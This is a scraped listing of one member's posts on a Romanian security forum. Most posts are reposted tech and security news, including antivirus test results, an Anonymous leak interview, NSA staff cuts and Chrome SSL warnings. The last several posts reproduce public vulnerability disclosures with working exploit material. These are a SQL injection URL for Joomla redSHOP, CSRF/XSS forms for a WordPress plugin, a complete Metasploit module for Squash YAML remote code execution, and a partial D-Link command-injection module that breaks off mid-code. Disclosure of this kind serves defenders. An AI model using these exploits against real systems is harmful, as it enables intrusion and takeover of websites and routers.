-
Posts
1773 -
Joined
-
Last visited
-
Days Won
6
Everything posted by Matt
-
AV-Test.org a dat publicitatii un test complex pe 30 de produse de securitate pentru Android in care a evaluat rata de detectie pe un set de 1972 virusi, impactul asupra bateriei, alarmele false generate si functiile oferite. Testul s-a realizat pe un sistem Android 4.2.2. O diferenta fata de testele anterioare a fost precizarea procentelor exacte de detectie cu zecimale, pentru fiecare produs in parte. In categoria protectie s-au oferit maxim 6 puncte pentru o detectie de 100%, si aici s-au incadrat sapte produse BitDefender Mobile Security. La categoria 5.5 puncte (intre 99 si 99.9% detectie) s-au incadrat: AhnLab, Antiy AVL, BitDefender, Kaspersky, Kingsoft, Qihoo. Bornaria, AegisLab, Zoner si SPAMfighter au avut cele mai mici detectii si cea mai slaba protectie. In ceea ce priveste impactul asupra utilizarii telefonului, toate produsele au primit 6 puncte cu patru exceptii: AhnLab, Trend Micro, Symantec si G Data. De aceasta data sase produse au obtinut maximul de puncte: 12 la ambele categorii si anume: Antiy AVL, BitDefender Mobile Security, Kaspersky, Kingsoft, Qihoo 360 Mobile. Pentru protectia dispozitivului tau Android iti recomandam oricare din produsele care care au obtinut 5.5 sau 6 puncte la categoria “Protectie”. Detaliile complete le gasiti aici: AV-TEST - The Independent IT-Security Institute: Jul 2013 Sursa FaraVirusi.COM
-
Te-ai pus pe facut posturi sa te poti duce la sectiunea "cereri" ?
-
US Army’s Active-Duty Captain Reveals “More Leaks like Snowden coming soon” because Anonymous Inside An Exclusive statement revealed by An active-duty Army captain, he revealed that like Bradley Manning & Edward Snowden there are a lot more whistleblowers in the US Army, the Captain revealed these things on the condition of anonymity. Buzz Feed takes an Exclusive Interview with that captain which reveals all the Dark Truth Inside the Base and during the Interview Last question which was asked by Buzz Feed reveals that More Leaks are coming Soon. (Here is Interview Starts) Q1. Are there a lot of members of Anonymous in the Army? There are more than you would think, more heavily in the techie world [of the military] — especially at Fort Huachuca, where all the intel people are. A lot of them wanted to get the job [there] because they want to learn secret stuff and have a better personal understanding of how the world actually works. Q2. How do you know who is in Anonymous? Initially we have the handshaking phase. The lingo is still relatively unknown. In conversation, you drop in jokes. If you are with someone on a mission, you’re like, “Man, there are over 9,000 reasons that this is a bad idea.” That initially establishes friendship. Once you feel comfortable with the person and they aren’t just posing as part of the culture, then you talk about what they’ve done and how much a part of it they are. It gets to the point where you are discussing individual operations. Q3. What are the most popular operations amongst soldiers? Anonymous is so distributed and leaderless that everyone has operations they love and hate. Operation Cartel, especially at Fort Bliss. Operation Dark Net was universally loved. And Operation Payback was pretty well received. Q4. What about you? I was involved in the Arab Spring opening up internet communications. I was a facilitator for a lot of people who have more skills than me in the cyber world. I knew people who I met through 4chan, 9Chan, and 7Chan and then a lot of AnonOps IRCs and who they needed to talk to — the organizations that would help them, and people in government would give them resources and access — and was able to convince them to talk to people in Anonymous. I got people in the right [internet relay chat] rooms at the right time. Q5. Would the military consider you a white or black hat? The military sees me as black hat. Q6. Is that a fair assessment? All hats are gray. Every white hacker I know has a night job that is very much a black-hat job. Q7. What were the results of what you did for the Arab Spring? From what I heard they were able to establish ways to assist the activists to have a method where they could get information out of Egypt and have certain Twitter accounts tweet that information on their behalf. But I don’t know for sure. As soon as I was like, “Hey, this is this person,” and vice versa, they did tweet confirmation to make sure that certain Twitter accounts were controlled by certain people, and then I headed out of the room so there would be no “taint” of having a fed there. Q8. Why do Anonymous members outside the military trust you? My credibility is incredibly suspect in the group. I admit I work for the feds, and I provide information on myself so that they are comfortable. There are people who I only know as screen names but I have put my career in their hands. Q9. What specific actions have other soldiers taken? There are several [soldiers] I know that probably did things, but I don’t know know that they did. I can legally say, probably under a [lie] detector, I have no proof that they did it. We keep our activities totally separate because at any point in time I can be put in the chair that I can’t lie in. You have to keep the /b/ [4chan’s “Random” board] brotherhood strong. Q10. Does the military know about the Anonymous presence? Pre-Manning, there were several academic papers put out trying to analyze it and school the leadership. Because the Army is a very top-down organization, they assume that [Anonymous] is too. Leadership wasn’t concerned with it until Manning happened. Then they read everything under the [lens] of what Manning did and it just scared them — scared them blind. They know we are in there and they assume that we are all going to do a Manning or a Snowden. Q11. How have they addressed it? Every six months you are mandated to get a Threat Awareness and Reporting Procedures Brief. It used to be very much like how to … spot the Iraqi contractor who is pacing off your base. Now it is, “Look at the person at your left and right. Are they espousing social beliefs that don’t line up with Army values? What websites do they go to at work?” With the caveat that it is OK to have political beliefs that are different. You get a heavy-handed feeling. I have had more than a few officers come up to me and as we are trying to talk about [Anonymous] they are worried, like, “Are you CID [working undercover for the Central Investigative Division]?” Because you always worry about that. Q12. Are the retaliations against Manning and Snowden discouraging Anonymous activity and the desire to leak information? A lot [of Anonymous members] have been in long enough and are jaded. They are watching as the government comes down harder and harder. There is a growing sense of disdain and hatred because we are complicit in it. There are some secrets that need to be secrets but the stuff [the military] keeps secret just to protect the bottom line — you just feel like you are selling your soul every day. That is a lot of the motivation. Especially for people of the generation that believe that information should be free. Q13. Are we going to see more leaks? Yes. A lot [of Anonymous members] are mid- to high-rank NCOs. They are well-respected, have connections, and overly large security clearances. A lot of people who are part of the [Anonymous] culture are just dying at this point for something to come across their table that isn’t already out there. It is so easy to leak information that if you want to, you can do it. Source HackersNewsBulletin.COm
-
INDIA : Latest News coming from a Hacker with the twitter handle (@Phr0zenM) who successfully taken down the opposition political party Bhartiya Janta Party (BJP) Official website (www.bjp.org). About BJP : (Wikipedia) The Bharatiya Janata Party is the smaller of the two major partiesin the Indian political system, the other being the Indian National Congress. Established in 1980, it is India’s second largest political party in terms of representation in the parliament and in the various state assemblies. Hacker tweeted about this taken down and also stated in a tweet that “We will not forget our brothers and sisters in Kashmir, those oppressed, killed, raped, tortured for decades. #OpKashmir #OpIzzah” Here is the screenshot, we checked the website for it’s tangodown: Source HackersNewsBulletin.COm
-
The piracy landscape has changed a lot in the last decade. Prominent peer-to-peer services have been abandoned due to legal threats, torrenting emerged as the gold standard for grabbing content without paying, and lots of relatively inexpensive legal alternatives have sprung up (at least for music). There's been one constant in that landscape, however: The Pirate Bay. Perhaps the most notorious torrent-tracking site of our age is celebrating its 10th birthday; on its blog, those behind TPB have posted a message commemorating "a decade of agression [sic], repression, and lulz." It goes on to say that TPB team didn't think they'd "make it this far" — not because of "cops, mafiaa [sic], or corrupt politicians," but because they thought they'd "eventually be to [sic] old for this shit." To go along with that anniversary, The Pirate Bay has just released its new "PirateBrowser" — essentially a modified and pre-configured version of Firefox for Windows. The browser will supposedly let users bypass any ISP blockade that keeps them from visiting TPB or any other site being blocked. According to Torrent Freak, the browser is based on Firefox 23 and includes a Tor client and proxy configurations to speed up loading times. Despite the inclusion of Tor (free software that helps anonymize your browsing experience), Torrent Freak notes that PirateBrowser doesn't actually provide anonymous browsing — it's simply to get around ISP blocks. It's the latest tool in The Pirate Bay's "mission," but things haven't exactly been smooth sailing for the site, not for some time. Its founders recently served jail time for their activities, with one of the founders going back to prison in an unrelated Swedish hacking case. The site also stopped hosting torrent files, instead opting for "magnet" links — though it wasn't a move that really cut down on the site's usefulness to pirates. The site even had to be relocated out of Sweden recently in an effort to find more favorable legal footing. Despite all of the complications, however, the site still persists — and while we wouldn't be surprised one day to wake up and find the site finally shut down for good for one reason or another, it seems just as likely that The Pirate Bay will continue to persist. Sursa TheVerge.Com
-
Liniile aeriene vor putea oferi in curand pasagerilor internet de mare viteza in timpul zborului, fara intreruperi, chiar si deasupra oceanelor, datorita evolutiei serviciilor prin satelit, iar companiile specializate promit ca, odata cu scaderea costurilor, broadband-ul in avion va deveni gratis. Conexiunile care asigura in prezent serviciile de internet in zbor, improvizate din servicii destinate telefoanelor mobile si televiziunii DTH, vor fi inlocuite de semnale puternice, concentrate pe aeronave, transmise de sateliti performanti, potrivit Bloomberg. Cererea semnificativa pentru servicii de internet de mare viteza in avion va genera suficiente afaceri pentru a facilita scaderea costurilor, astfel ca broadband-ul in zbor va deveni intr-un final gratis, potrivit directorilor executivi din industrie, contactati de Bloomberg. In prezent, conexiunile la internet in avion ofera viteze scazute de descarcare, sunt intrerupte de numeroase "zone moarte" si nu satisfac pasagerii. Grupul american ViaSat Inc. va lansa in septembrie serviciul de internet de mare viteza, prin satelit, pentru aeronave, care va fi disponibil initial pentru pasagerii JetBlue Airways. ViaSat promite fiecarui pasager o conexiune mai performanta in zbor decat viteza disponibila in prezent pentru o intreaga aeronava. "Cu 10 ani in urma, eram obisnuiti sa utilizam dial-up (conexiune la internet prin linie telefonica - n.r.). Nimeni nu mai face asta acum. Aceeasi evolutie prin care am trecut in locuinta va avea loc acum in aeronave", comenteaza pentru Bloomberg Tim Mahoney, directorul general al diviziei de tehnologie aerospatiala a grupului american Honeywell International, care ofera echipamente pentru sateliti. Satelitii sunt acum capabili de asa-numite "raze spot", care transmit un semnal concentrat, fata de acoperirea de tip umbrela asigurata de tehnologiile de transmisie TV. Astfel este asigurata suficienta viteza pentru a oferi un serviciu de calitate tuturor pasagerilor aflati intr-un avion. Ce alti sateliti vor fi lansati Grupul britanic Inmarsat intentioneaza sa lanseze pana anul viitor trei sateliti cu raze spot, iar Intelsat (Luxemburg) anticipeaza ca primul satelit propriu va fi in spatiu in 2015. Directorul general al JetBlue, Dave Barger, a declarat recent ca spera sa poata oferi, pana in 2015, servicii de internet broadband pentru toate zborurile operate. Conexiunea la internet in aer este disponibila in prezent pentru 40% dintre zborurile operate de companiile din SUA si Canada, potrivit analistilor. Rata de utilizare este foarte redusa, estimandu-se ca numai 5% dintre pasageri sunt dispusi sa plateasca in plus pentru a accesa internetul in timpul calatoriilor. JetBlue promite acces gratis la internet pe primele 30 de aeronave care vor fi echipate cu serviciul ViaSat, insa urmeaza sa introduca o taxa suplimentara pentru pasagerii care doresc sa acceseze continut mai intens, precum servicii video. Odata cu raspandirea larga a noilor tehnologii si cresterea ratei de utilizare, costurile suportate de catre operatorii aerieni vor deveni comparabile cu un suc si o punga de alune per pasager, astfel ca serviciul de internet broadband in zbor are sanse mari sa devina gratis, anticipeaza executivii ViaSat. Source Business24.RO
-
Latvia will extradite an alleged pusher of the online bank account raiding Trojan Gozi to the US - despite opposition from the Baltic republic's foreign minister. Deniss Calovskis, 27, and two other alleged co-conspirators (Russian national Nikita Kuzmin and Mihai Ionut Paunescu, a 28-year-old Romanian) were accused of masterminding the software nasty in an indictment unsealed in January. The Gozi banking Trojan was used to steal millions of dollars from netizens after infecting one million computers worldwide - including systems at NASA - the US attorney for the southern district of New York alleged. Kuzmin, who wrote the Trojan, was arrested in the US in November 2010 and pleaded guilty to various computer hacking and fraud charges in May 2011. Calovskis allegedly developed code, known as "web injects", that altered how the websites of particular banks appeared on computers infected with Gozi. He was arrested in Latvia in November 2012. Paunescu, who operated under the handle Virus, allegedly supplied the "bulletproof [web] hosting" service that helped Kuzmin and others to distribute the Trojan as well as ZeuS, SpyEye and other malware. Paunescu was arrested in Romania in December 2012. Extradition requests against Calovskis and Paunescu have been filed in Latvia and Romania, respectively, according to the US Feds. Latvian foreign minister Edgars Rink?vi?s argued last week that Calovskis ought to face justice in Latvia rather than the possibility of a "disproportionate" sentence if he was extradited to the US. Calovskis potentially faces up to 67 years behind bars if convicted on all charges. After the Latvian courts approved his extradition to America, the issue fell to a close vote of the country's cabinet ministers on Tuesday. Seven ministers backed the extradition, against five who voted against and one who abstained, Bloomberg reports. The vote gave a green light to attempts to haul Calovskis over the the US. However Calovskis's lawyer, Saulvedis Varpins, told Latvian television station LNT that he intended to appeal the case to the European Court of Human Rights, Reuters reports. The 27-year-old denies any wrongdoing. ® Sursa TheRegister.co.uk
-
The UK's top anti-fraud agency has admitted it sent tens of thousands of sensitive documents from an investigation into arms giant BAE Systems to the wrong person. The probe into multinational defence corporation BAE Systems ended after the aerospace firm paid a whopping $400m fine to the US relating to a violation of US rules across a number of countries (and £30m to the SFO over accounting issues in a Tanzanian radar deal) back in 2010. After it closed the case, the Serious Fraud Office was then supposed to return 32,000 pages of documents and 81 audio tapes, as well as other assorted bits of electronic storage media, to 59 different people who supplied them as evidence during the investigation. But the SFO mistakenly sent the huge cache to one unnamed individual – and three per cent of the data remains missing. The SFO insisted none of the data related to national security and said it was making every effort to recover the missing information. A Serious Fraud Office spokeswoman said: "The SFO is dealing with an incident of accidental data loss. "The data concerned was obtained by the SFO in the course of its closed investigation into BAE Systems. The SFO has a duty to return material to those who supplied it, upon request, after the close of an investigation. "In this instance the party requesting the return was sent additional material which had in fact been obtained from other sources." The embarrassing data fumble took place between May and October 2012. It was only flagged up in May 2013 and the SFO rolled into action in June. The affected parties were notified and an investigation has now begun. Alan Woods, a former senior civil servant, is leading the probe, which was was ordered by the SFO's director. Emily Thornberry, Labour's shadow attorney general, said: "This is government incompetence of the first magnitude. The SFO has stumbled from shambles to shambles, with the attorney general completely failing to get a grip. Incompetence like this threatens to have an impact on the reputation of the UK and its relations overseas." She added: "People will be wondering how many other skeletons there are in the SFO cupboard that the attorney general is aware of but is declining to make public. The government needs to get a grip, get to the bottom of this mess and come clean about exactly what went wrong and how." Do you know who received these leaked documents from the SFO? Get in touch and tell us in confidence. ® Sursa TheRegister.co.uk
-
The NSA has announced its brainwave to end further leaks about its secret operations by disaffected employees: it will simply sack 90 per cent of all its sysadmins. The US surveillance agency's spyboss General Keith Alexander told a computer security conference in New York that automating much of his organisation's work - such as snooping on anyone with an internet connection - will make it more secure. The inner workings of the NSA's massive PRISM and XKEYSCORE programmes were exposed to the world by Edward Snowden, an ex-CIA techie and NSA contractor who had access to highly classified material, along with about 1,000 other sysadmins. Gen Alexander said: "What we're in the process of doing - not fast enough - is reducing our system administrators by about 90 percent." Until now, the chief spook continued, the NSA has "put people in the loop of transferring data, securing networks and doing things that machines are probably better at doing". Replacing these leaky humans with computers would make the spooks' work "more defensible and more secure". However, the general said his agency had been planning these changes for some time. He did not refer to Snowden by name while announcing his layoffs. The head spook has previously discussed security measures employed by the agency, such as the requiring the presence of two people before certain sensitive data can be accessed. "At the end of the day it's about people and trust," Gen Alexander added. "No one [at the NSA] has wilfully or knowingly disobeyed the law or tried to invade your civil liberties or privacies. There were no mistakes like that at all." ® Sursa TheRegister.co.uk
-
Facebook is rolling out changes to its News Feed to allow older, more popular posts to resurface in a bid to please page owners and advertisers. In a blog post explaining the update, Facebook revealed that each time a user logs on to Facebook, there are an average of 1,500 potential posts that could be displayed at any one time. These include simple stories such as photo tags to more significant changes such as relationship status updates. Facebook revealed exactly what interactions change the likelihood of a post displaying in a user's News Feed, which is the first page users see when they log in: 1. "How often you interact with the friend, page, or public figure (like an actor or journalist) who posted 2. The number of likes, shares and comments a post receives from the world at large and from your friends in particular 3. How much you have interacted with this type of post in the past 4. Whether or not you and other people across Facebook are hiding or reporting a given post" Previously, up to 43 percent of a user's feed was unread, but the changes Facebook is implementing means that posts users failed to reach when scrolling through their News Feed will now resurface at the top of the feed in non-chronological order. Posts already appear in the feed out of order, but this update will further alter that system. This change will also force page owners to ensure their pages receive interactions – such as likes and comments – on a regular basis. Users whose posts are ignored or hidden by their friends will receive little coverage. In the first blog post of its type, Facebook attempted to explain in more detail how page administrators, such as small business owners, can make better use of the News Feed. Facebook is still rolling out its new News Feed to users, after announcing it at the beginning of 2013. However, the new design has yet to make it to all users, meaning page owners and advertisers are having to grapple with multiple user interfaces for which they must design adverts and other content Last month, Facebook posted better than expected profits of $333m and pleased investors by significantly bolstering its mobile user base, with 819m monthly mobile users. Sursa V3.co.uk
-
Eu am folosit ATI atatia ani si pe desktop si pe laptop.Nu am avut mari satisfactii.Nu am prea multi fps in jocuri , din ce am citit Nvidia scot performante mai bune.
-
Zatarra e de vina : https://rstforums.com/forum/73674-buna-seara.rst#post476836
-
Security software maker ESET this week launched the latest version of its mobile security solution for Android. Completely rebuilt and redesigned, the new ESET Mobile Security for Android brings improved scanning, an anti-phishing module and a redesigned user interface, the company said. ESET Mobile Security for Android was designed to protect Android smartphone and tablet users in less secure environments. The mobile security solution protects users as they connect to public Wi-Fi networks and protects them when visting sketchy websites or clicking on suspicious email or chat messages. The solution also protects users when downloading apps from third party stores and monitors their permissions. ESET is offering two versions of Mobile Security for Android: A free version offering basic protections, and a full version that can be upgraded from within the app for additional protection against both digital and physical threats. In addition to antivirus scanning, ESET Mobile Security for Android offers: • A startup and anti-theft wizard • The ability to filter or block SMS or incoming calls at specified times. • Security Audit—Monitor installed application permissions such as location tracking, access to contacts, or in-app purchases to close any security loopholes. • Enhanced Anti-Phishing Module and Built-in USSD Control Features—Protect against phishing attacks and web-based attacks via malicious SMS messages, QR codes, or URL links. "One of our goals with the new version of ESET Mobile Security for Android was to make protection even easier for users," said Andrew Lee, CEO, ESET North America. "Our new user interface and setup wizards are designed for mobile users looking for simple and powerful security products that are easy to configure, run quietly in the background, and require limited resources." According to the International Data Corporation (IDC) Worldwide Quarterly Mobile Phone Tracker, Android maintained its leadership position in Q2 2013 with a 69.1% market share based on 108 million units shipped. With such a high market share, Android’s popularity makes it an increasingly attractive target for cyber criminals. According to ESET research, from 2011 to 2012, Android malware grew by a factor of 17. According to a report from Trend Micro released this week, the number of malicious and high-risk Android apps jumped by more than 40 percent during the past few months. The number of risky apps hit 718,000 at the end of the second quarter compared to 509,000 in the first quarter, Trend Micro said. ESET Mobile Security for Android is available via web and Google Play. More information from be found here.
-
Google research finds whopping SSL click-through rates Admins of Chrome shops unite – your users are dabbling with dodgy SSL, and you must teach them how to be safer online until Google updates its browser. That's the gist of a new report from Google researcher Adrienne Porter Felt and University of California, Berkeley graduate student Devdatta Akhawe, who trawled some 25 million data points in a quest to figure out how effective phishing, malware, and SSL warnings are for users of Chrome and Firefox. The paper in which the flaws are discussed – Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness – will be presented next week at the USENIX Security Symposium 2013 in Washington, DC. It finds that Chrome could borrow a number of useful traits from Firefox to reduce the rate at which users click through SSL warnings, potentially opening their computers to being compromised. "Google Chrome users are 2.1 times more likely to click through an SSL warning than Mozilla Firefox users," the researchers write. They believe this high click-through rate comes from a combination of aesthetics, the storage of user-set SSL exemptions, and different demographics from users of different operating systems. The report found that Firefox's use of a stylized policeman combined with the use of the word "untrusted" in the title likely had an effect on stopping users from bypassing the warning. It also noted that Firefox forces users to make three clicks versus one in Chrome to bypass the warning, and this is likely to have had an effect as well. However, both browsers have specific technologies that skew their own hit rates up (Google), and down (Firefox). Chrome, for instance, ships with a technology called "certificate pinning" that skews Google's click-through rate upward. Pinning adds a list of certificated preloaded HTTP Strict Transport Security sites, such as Google, PayPal, and Twitter, where users cannot click past SSL warnings. This means that some 20 per cent of all Google Chrome SSL warning impressions are non-bypassable, compared with Firefox's 1 per cent. Therefore, Firefox users see warnings for sites that Google users do not see, and by not clicking through on these critical warnings, Firefox's SSL click-through rate is skewed down as compared to Chrome's. Further contributing to this is the fact Firefox lets users permanently make exceptions for specific sites also lowered that browser's SSL click-through rate: Though these two specific technologies are likely shifting the click-through rates among the surveyed population, that does not account for the yawning gulf in click-throughs between Firefox and Chrome, the researchers write. In light of the study, Google plans to test an exception-remembering feature in Chrome to halt "warning fatigue" among users and make them more careful when confronted with warnings. It has also begun a series of A/B tests to test the effectiveness of "a number of improvements". For the time being, however, it seems the greatest advice an admin can dispense to their users is as familiar as ever: RTFW – Read The Flipping Warning. ® Sursa TheRegister.co.uk
-
Se referea la DOCS stie el ce zice.. era un ftp cu books dar din pacate e inchis.
-
Din pacate acea baza de carti nu mai este. https://www.dropbox.com/s/5k4yile3gk9633q/Cisco%20voice%20over%20IP%28CVOICE%29.pdf https://www.dropbox.com/s/csi80aiio6uucb9/Cisco%20IP%20Telephony%20%28CIPT%29%20%20v6.0%20Volumes%201_2008_p356.pdf https://www.dropbox.com/s/xwr5vrue7hf7cxo/ts_ccm_301.pdf Ultima carte nu sunt sigur ca e ceea ce ceri tu. Primele 2 sunt gasite.
-
Description : sXid is an all-in-one suid/sgid monitoring program designed to be run from cron on a regular basis. It tracks any changes in your s[ug]id files and folders. If there are any new ones, ones that are not set any more, or they have changed bits or other modes, it reports the changes in an easy to read format via email or on the command line. Changes : sXid now uses a SHA-256 hash function to track files. autoconf settings was updated to version 2.69. automake 1.13.3 is used to generate Makefiles. A --version option was added. /media and /sys directories were added to the EXCLUDE option. Man pages were converted to an mdoc macro. The README was converted to Markdown format. There were minor code improvements and miscellaneous bugfixes. Download : HERE
-
Description : Joomla redSHOP component version 1.2 suffers from a remote SQL injection vulnerability. Author : Matias Fontanini Source : Joomla redSHOP 1.2 SQL Injection ? Packet Storm Code : -------------------------------------------- Joomla! redSHOP component v1.2 SQL Injection -------------------------------------------- == Description == - Product: Joomla! redSHOP component - Product link: http://redcomponent.com/redcomponent/redshop - Vendor: redcomponent - Affected versions: version 1.2 is vulnerable. Other versions might be affected as well. - Vulnerability discovered by: Matias Fontanini == Vulnerability == When using the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks. The following proof of concept request retrieves the database user, name and version: http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 == Solution == Upgrade the product to the 1.3 version. == Report timeline == [2013-08-02] Vulnerability reported to vendor. [2013-08-02] Developers answered back indicating that an update would be released soon. [2013-08-06] redSHOP 1.3 was released, which fixes the reported issue. [2013-08-08] Public disclosure.
-
Description : WordPress HMS Testimonials plugin version 2.0.10 suffers from cross site request forgery and cross site scripting vulnerabilities. Author : Matias Fontanini Source : WordPress HMS Testimonials 2.0.10 XSS / CSRF ? Packet Storm Code : Update ======================== Fixed wrong dates. Details ======================== Application: HMS Testimonials ( http://wordpress.org/plugins/hms-testimonials/ ) Version: 2.0.10 Type: Wordpress Plugin Vendor: Jeff Kreitner ( http://profiles.wordpress.org/kreitje/ ) Vulnerability: - Cross-Site Request Forgery (CWE-352) - Cross-Site Scripting (CWE-79) Description ======================== Display your customer testimonials on pages or posts. Use groups to organize and display specific testimonnials on specific pages. Vulnerability ======================== This plugin is vulnerable to CSRF on all forms, as well as XSS on some of them 1. Testimonials is vulnerable to CSRF and XSS 2. Group is vulnerable to CSRF 3. Settings 3.1. Default is vulnerable to CSRF 3.2. Advanced is vulnerable to CSRF 3.3. Custom Fields is vulnerable to CSRF and XSS 3.4. Templates is vulnerable to CSRF and XSS This can be used in many different ways, like defacement of both public site and the admin area (only the HMS Testimonials plugin area will be affected), modify settings to set a lower role as moderator (very harmful on sites with open registrations), etc. Proof of Concept ======================== 1. Testimonial <form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew"> <input type="hidden" name="name" value="<script>alert('xss')</script>"> <input type="hidden" name="image" value="<script>alert('xss')</script>"> <input type="hidden" name="testimonial_date" value="08/08/2013"> <input type="hidden" name="url" value="<script>alert(String.fromCharCode(88,83,83))</script>"> <input type="hidden" name="testimonial" value="<script>alert('xss')</script>"> <input type="hidden" name="display" value="1"> <input type="submit" name="save" value="Save Testimonial"> </form> 2. Group <form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true"> <input type="hidden" name="name" value="New group"> <input type="submit" name="save" value="Save Group"> </form> 3.1. Settings - Default <form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings"> <input type="hidden" name="active_links_nofollow" value="1"> <input type="hidden" name="image_width" value='100'> <input type="hidden" name="image_height" value='100'> <input type="hidden" name="date_format" value='m/d/Y"><script>alert(3)</script>'> <input type="hidden" name="testimonial_container" value='div'> <input type="hidden" name="recaptcha_publickey" value=""> <input type="hidden" name="recaptcha_privatekey" value=""> <input type="submit" name="save" value="Save Settings (Default)"> </form> 3.2. Settings - Advanced <form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced"> <input type="hidden" name="moderator" value="subscriber"> <input type="hidden" name="roles" value="subscriber"> <input type="hidden" name="num_users_can_create" value="9999"> <input type="hidden" name="autoapprove" value="subscriber"> <input type="hidden" name="moderators_can_access_settings" value="1"> <input type="hidden" name="js_load" value="1"> <input type="hidden" name="roleorder[]" value="editor"> <input type="hidden" name="roleorder[]" value="author"> <input type="hidden" name="roleorder[]" value="contributor"> <input type="hidden" name="roleorder[]" value="subscriber"> <input type="submit" name="save" value="Save Settings (Advanced)"> </form> 3.3. Settings - Custom Fields <form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields"> <input type="hidden" name="name" value="xss"> <input type="hidden" name="type" value="textarea"> <input type="hidden" name="showonform" value="1"> <input type="submit" name="save" value="Save Settings (Custom Fields)"> </form> 3.4. Settings - Template <form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new"> <input type="hidden" name="name" value="New template<script>alert('xss')</script>"> <input type="hidden" name="item[]" value="system_id"> <input type="submit" name="save" value="Settings Templates (Save)"> </form> Solution ======================== Update to HMS Testimonials 2.0.11 Timeline ======================== 2013-09-08 - Contacted developer with details 2013-09-08 - Fix released 2013-09-08 - Disclosed public
-
Description : This Metasploit module exploits a remote code execution vulnerability in the YAML request processor of the Squash application Author : Charlie Eriksen Source : Squash YAML Code Execution ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Squash YAML Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the YAML request processor of the Squash application. }, 'Author' => [ 'Charlie Eriksen' # Discovery, initial exploit ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://ceriksen.com/2013/08/06/squash-remote-code-execution-vulnerability-advisory/'], [ 'OSVDB', '95992'], [ 'CVE', '2013-5036'] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Aug 06 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]) ], self.class) end def check response = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "api", "1.0", "deobfuscation"), 'method' => 'POST', 'ctype' => 'application/json', }) if response.code == 422 print_status("Got HTTP 422 result, target may be vulnerable") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" payload = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "") data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}" send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "api", "1.0", "deobfuscation"), 'method' => 'POST', 'ctype' => 'application/json', 'data' => data }) end end
-
Description : Different D-Link Routers are vulnerable to OS command injection via the web interface. The vulnerability exists in command.php, which is accessible without authentication. This Metasploit module has been tested with the versions DIR-600 2.14b01, DIR-300 rev B 2.13. Two target are included, the first one starts a telnetd service and establish a session over it, the second one runs commands via the CMD target. There is no wget or tftp client to upload an elf backdoor easily. According to the vulnerability discoverer, more D-Link devices may affected. Author : Michael Messner, juan vazquez Source : D-Link Devices Unauthenticated Remote Command Execution ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection via the web interface. The vulnerability exists in command.php, which is accessible without authentication. This module has been tested with the versions DIR-600 2.14b01, DIR-300 rev B 2.13. Two target are included, the first one starts a telnetd service and establish a session over it, the second one runs commands via the CMD target. There is no wget or tftp client to upload an elf backdoor easily. According to the vulnerability discoverer, more D-Link devices may affected. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '89861' ], [ 'EDB', '24453' ], [ 'BID', '57734' ], [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ], [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ] ], 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true, }, 'Targets' => [ [ 'CMD', #all devices { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Telnet', #all devices - default target { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], ], 'DefaultTarget' => 1 )) end def exploit if target.name =~ /CMD/ exploit_cmd else exploit_telnet end end def exploit_cmd if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = "#{payload.encoded}; echo end" 